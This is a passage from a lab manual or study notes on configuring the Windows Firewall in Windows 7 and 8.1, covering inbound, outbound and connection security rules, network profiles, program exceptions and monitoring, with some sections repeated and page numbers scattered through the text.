and outbound rules, which are enabled depending on the location of the network you are
connected to.

Inbound rules are applied to the traffic that is coming from the network and the Internet to
your computer or device. Outbound rules apply to the traffic from your computer to the
network or the Internet.

These rules can be configured so that they are specific to: computers, users, programs,
services, ports or protocols. You can also specify to which type of network adapter (e.g.
wireless, cable, virtual private network) or user profileit is applied to.
42
lOMoARcPSD|24630861

In the Windows Firewall with Advanced Security, you can access all rulesand edit their
properties. All you have to do is click or tap the appropriate unit in the left-side panel.

The rules used by the Windows Firewall can be enabled or disabled. The ones which are
enabled or active are marked with a green check-box in the Name column. The ones that are
disabled are marked with a gray check-box.

If you want to know more about a specific rule and learn its properties, right click on it and
select Properties or select it and press Properties in thecolumn on right, which lists the
actions that are available for your selection.

43
lOMoARcPSD|24630861

What Are The Connection Security Rules?

Connection security rules are used to secure traffic between two computers while it crosses
the network. One example would be a rule which defines that connections between two
specific computers must be encrypted.

Unlike the inbound or outbound rules, which are applied only to one computer, connection
security rules require that both computers have the same rules defined and enabled.

If you want to see if there are any such rules on your computer, click or tap "Connection
Security Rules" on the panel on the left. By default, there are no such rules defined on
Windows computers and devices. They are generally used in business environments and such
rules are set by the network administrator.
lOMoARcPSD|24630861
44

What Does the Windows Firewall with Advanced Security Monitor?

The Windows Firewall with Advanced Security includes some monitoringfeatures as well. In the
Monitoring section you can find the following information: the firewall rules that are active
(both inbound and outbound),the connection security rules that are active and whether there are
any active security associations.

You should note that the Monitoring section shows only the active rules for the current network
location.
used to determine the operating system running on the host machine. Another feature is "boot
time filtering". This feature ensures that the firewall is working at the same time when the
network interface becomes active, which was not the case in previous versions of Windows.

When we first connect to some network, we are prompted to select a network location. This
feature is known as Network Location Awareness (NLA). This feature enables us to assign a
network profile to the connection based on the location. Different network profiles contain
different collections of firewall rules. In Windows 7, different network profiles can be
configured on different interfaces. For example, our wired interface can have different profile
than our wireless interface. There are three different network profiles available:

• Public
• Home/Work - private network
• Domain - used within a domain
We choose those locations when we connect to a network. We can always change the
location in the Network and Sharing Center, in Control Panel. The Domain profile can be
automatically assigned by the NLA service when we log on to an Active Directory domain.
Note that we must have administrative rights in order to configure firewall in Windows 7.
2.1.1 Configuring Windows Firewall
To open Windows Firewall we can go to Start > Control Panel >

lOMoARcPSD|24630861
45
Windows Firewall.

By default, Windows Firewall is enabled for both private (home or work) and public
networks. It is also configured to block all connections to programs that are not on the list of
allowed programs. To configure exceptions we can go to the menu on the left and select
"Allow a program or feature trough Windows Firewall" option.

Exceptions

To change settings in this window we have to click the "Change settings" button. As you can
see, here we have a list of predefined programs and features that can be allowed to
communicate
lOMoARcPSD|24630861
46

on private or public networks. For example, notice that the Core Networking feature is allowed
on both private and public networks, while the File and Printer Sharing is only allowed on
private networks. We can also see the details of the items in the list by selecting it and then
clicking the Details button.

Details
If we have a program on our computer that is not in this list, we can

manually add it by clicking on the "Allow another program" button.

 Add a Program
Here we have to browse to the executable of our program and then click the Add button.
Notice that we can also choose location types on which this program will be allowed to

lOMoARcPSD|24630861
47

communicate by clicking on the "Network location types" button.

Network Locations
Many applications will automatically configure proper exceptions in Windows Firewall when
we run them. For example, if we enable streaming from Media Player, it will automatically
configure firewall settings to allow streaming. The same thing is if we enable Remote
Desktop feature from the system properties window. By enabling Remote Desktop feature
we actually create an exception in Windows Firewall.

Windows Firewall can be turned off completely. To do that we can select the "Turn Windows
Firewall on or off" option from the menu on the left.

Firewall Customization
Note that we can modify settings for each type of network location (private or public).
Interesting thing here is that we can block all incoming connections, including those in the
list of allowed programs.

Windows Firewall is actually a Windows service. As you know, services can be stopped and
started. If the Windows Firewall service is stopped, the Windows Firewall will not work.

48
lOMoARcPSD|24630861

Firewall Service
In our case the service is running. If we stop it, we will get a warning thatwe should turn on
our Windows Firewall.

Warning

Remember that with Windows Firewall we can only configure basic firewall settings, and
this is enough for most day-to-day users. However, we can't configure exceptions based on
ports in Windows Firewall any more. For that we have to use Windows Firewall with
Advanced Security.

How to Start & Use the Windows Firewall with Advanced Security
The Windows Firewall with Advanced Security is a tool which gives you detailed control
over the rules that are applied by the Windows Firewall.You can view all the rules that are
used by the Windows Firewall, change their properties, create new rules or disable existing
ones. In this tutorial we will share how to open the Windows Firewall with Advanced
Security, howto find your way around it and talk about the types of rules that are available
and what kind of traffic they filter. How to Access the Windows Firewall with Advanced
Security
 You have several alternatives to opening the Windows Firewall with Advanced Security:
One is to open the standard Windows Firewall window, by going to "Control Panel ->
System and Security -> Windows Firewall". Then, click or tap Advanced settings.

lOMoARcPSD|24630861
49

In Windows 7, another method is to search for the word firewall in the Start Menu search box
and click the "Windows Firewall with Advanced Security" result.
50
lOMoARcPSD|24630861

In Windows 8.1, Windows Firewall with Advanced Security is not returned in search results and
you need to use the first method shared above foropening it.

The Windows Firewall with Advanced Security looks and works the same both in Windows
7 and Windows 8.1. To continue our tutorial, we will use screenshots that were made in
Windows 8.1.
 What Are The Inbound & Outbound Rules?

In order to provide the security you need, the Windows Firewall has a standard set of
inbound and outbound rules, which are enabled depending on the location of the network
you are connected to.
Inbound rules are applied to the traffic that is coming from the network and the Internet to
your computer or device. Outbound rules apply to the traffic from your computer to the
network or the Internet.
These rules can be configured so that they are specific to: computers, users, programs,
services, ports or protocols. You can also specify to which type of network adapter (e.g.
wireless, cable, virtual private network) or user profileit is applied to.
In the Windows Firewall with Advanced Security, you can access all rules and edit their
properties. All you have to do is click or tap the appropriate unit in the left-side panel.

lOMoARcPSD|24630861
51
The rules used by the Windows Firewall can be enabled or disabled. The ones which are
enabled or active are marked with a green check-box in the Name column. The ones that are
disabled are marked with a gray check-box.If you want to know more about a specific rule and
learn its properties, right click on it and select Properties or select it and press Properties in the
column on right, which lists the actions that are available for your selection.

52
2.1.1.1 What Are The Connection Security Rules?

Connection security rules are used to secure traffic between two computers while it crosses
the network. One example would be a rule which defines that connections between two
specific computers must be encrypted.
Unlike the inbound or outbound rules, which are applied only to one computer, connection
security rules require that both computers have the same rules defined and enabled.
If you want to see if there are any such rules on your computer, click or tap "Connection
Security Rules" on the panel on the left. By default, there are no such rules defined on
Windows computers and devices. They are generally used in business environments and
such rules are set by the network administrator.

53
2.1.1.2 What Does the Windows Firewall with Advanced Security Monitor? The Windows
Firewall with Advanced Security includes some monitoring features as well. In the
Monitoring section you can find the following information: the firewall rules that are active
(both inbound and outbound), the connection security rules that are active and whether there
 are any active security associations.

You should note that the Monitoring section shows only the active rules for the current network
location.

RESULT:
Thus the Study of the features of firewall in providing network security and to set Firewall
Security in windows was performed.

54
55
56
57
58
59
60
61
62